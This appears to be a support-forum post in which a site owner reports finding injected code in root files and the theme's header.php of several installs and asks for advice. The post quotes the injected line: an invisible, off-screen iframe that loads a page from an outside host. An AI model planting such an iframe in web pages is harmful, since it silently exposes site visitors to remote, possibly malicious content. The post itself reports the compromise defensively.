Today I have noticed some ‘weird’ lines of codes in some of my installs:
The affected files are the following:
… all these in root.
In the theme folder (folders, if you have more themes), the header.php has the same code in it.
Here’s the code:
<iframe frameBorder=”0″ src=”http://79041018.naka.crctvn.org/counter/api/” style=”width:40px;height:40px;overflow:hidden;position:absolute;left:-40px;top:0;opacity:0″></iframe>
It really seems weird to me and I don’t recall having a plugin installed that would put this.
I have cleaned all the installations, but thought I should show you this, maybe you have more ideas/experience with it.
- The topic ‘New 'hacking' attempt and codes?’ is closed to new replies.